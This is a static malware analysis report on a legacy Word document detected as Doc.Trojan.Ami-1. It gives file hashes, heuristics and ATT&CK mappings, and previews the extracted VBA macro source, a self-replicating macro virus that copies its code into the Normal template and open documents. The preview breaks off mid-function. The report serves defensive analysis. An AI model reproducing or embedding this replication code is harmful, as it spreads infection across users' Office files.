Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f7c11e383e9c8ac0…

MALICIOUS

Office (OLE)

47.5 KB Created: 1999-06-05 14:13:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 12f4be89b957e971b274fcbadd1e0856 SHA-1: efc1297213948593ed1eb364997ca1461816ac5c SHA-256: f7c11e383e9c8ac0277e33019568398fa3952d8dcaf289357f689d1d3578bc74
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Word document containing a VBA macro with an AutoOpen function, a common indicator of malicious intent. The macro attempts to copy its code to other Office templates, suggesting an effort to achieve persistence. The heuristic firings and the presence of VBA macros strongly indicate malicious activity, though the specific family could not be determined.

Heuristics 4

  • ClamAV: Doc.Trojan.Ami-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ami-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21368 bytes
SHA-256: 16cf39f382d5e3d1f3bdb5ad3878da784f36f0421efb013b8b34bbabde824a04
Detection
ClamAV: Doc.Trojan.Ami-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "matiz"
Function MatizMe()
On Error Resume Next

Set MyHost_ = MyHost
Set MyNewHost_ = MyNewHost
ActiveHost_ = ActiveHost

Set MyHost = Nothing
Set MyNewHost = Nothing


CheckRefNormal
CheckRefActive


If AmINormInstalled = False Then
    If CheckNormHost = False Then
        MyNewHost.Add (vbext_ct_StdModule)
        MyNewHost("Modul1").Name = "Office_"
        NormHostName_ = "Office_"
    Else
        NormHostName_ = NormHostName
    End If
    
    Our1Line% = Find1Line
    
    VirusLines% = (MyHost_(ActiveHost_).CodeModule.CountOfLines - Our1Line)
    VirusCode$ = MyHost_(ActiveHost_).CodeModule.Lines(Our1Line, VirusLines%)
    HostLines% = MyNewHost_(NormHostName_).CodeModule.CountOfLines
    MyNewHost(NormHostName_).CodeModule.InsertLines (HostLines% + 1), VirusCode$
    
End If
    
If AmIActInstalled = False Then
    If CheckDokHost = False Then
        MyNewHost.Add (vbext_ct_StdModule)
        MyNewHost("Modul1").Name = "Office_"
        DokHostName_ = "Office_"
    Else
        DokHostName_ = DokHostName
    End If
    
    Our1Line% = Find1Line
    
    VirusLines% = (MyHost_(ActiveHost_).CodeModule.CountOfLines - Our1Line)
    VirusCode$ = MyHost_(ActiveHost_).CodeModule.Lines(Our1Line, VirusLines%)
    HostLines% = MyNewHost_(DokHostName_).CodeModule.CountOfLines
    MyNewHost(DokHostName_).CodeModule.InsertLines (HostLines% + 1), VirusCode$

End If
End Function

Function MyHost() As Object

If MacroContainer = NormalTemplate Then Set MyHost = NormalTemplate.VBProject.VBComponents
If MacroContainer = ActiveDocument Then Set MyHost = ActiveDocument.VBProject.VBComponents

End Function

Function MyNewHost() As Object

If MacroContainer = NormalTemplate Then Set MyNewHost = ActiveDocument.VBProject.VBComponents
If MacroContainer = ActiveDocument Then Set MyNewHost = NormalTemplate.VBProject.VBComponents

End Function

Function ActiveHost() As String
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
         
    For iq = 1 To NormalTemplate.VBProject.VBComponents(i).CodeModule.CountOfLines
        If Left(NormalTemplate.VBProject.VBComponents(i).CodeModule.Lines(iq, 1), 18) = "Function MatizMe()" Then
            ActiveHost = NormalTemplate.VBProject.VBComponents(i).Name
            Exit Function
        End If
    Next iq
         
Next i

For j = 1 To ActiveDocument.VBProject.VBComponents.Count

    For icq = 1 To ActiveDocument.VBProject.VBComponents(j).CodeModule.CountOfLines
        If Left(ActiveDocument.VBProject.VBComponents(j).CodeModule.Lines(icq, 1), 18) = "Function MatizMe()" Then
            ActiveHost = ActiveDocument.VBProject.VBComponents(j).Name
            Exit Function
        End If
    Next icq
                          
Next j

End Function

Function AmINormInstalled() As Boolean

AmINormInstalled = False

For i = 1 To NormalTemplate.VBProject.VBComponents.Count

For iq = 1 To NormalTemplate.VBProject.VBComponents(i).CodeModule.CountOfLines
    If Left(NormalTemplate.VBProject.VBComponents(i).CodeModule.Lines(iq, 1), 18) = "Function MatizMe()" Then
        AmINormInstalled = True
        Exit Function
    End If
Next iq

Next i

End Function

Function AmIActInstalled() As Boolean

AmIActInstalled = False

For i = 1 To ActiveDocument.VBProject.VBComponents.Count

For icq = 1 To ActiveDocument.VBProject.VBComponents(i).CodeModule.CountOfLines
    If Left(ActiveDocument.VBProject.VBComponents(i).CodeModule.Lines(icq, 1), 18) = "Function MatizMe()" Then
        AmIActInstalled = True
        Exit Function
    End If
Next icq

Next i

End Function

Function CheckDokHost() As Boolean

CheckDokHost = False

CheckItem = ActiveDocument.VBProject.VBComponents.Count

If CheckItem > 1 Then
    For 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.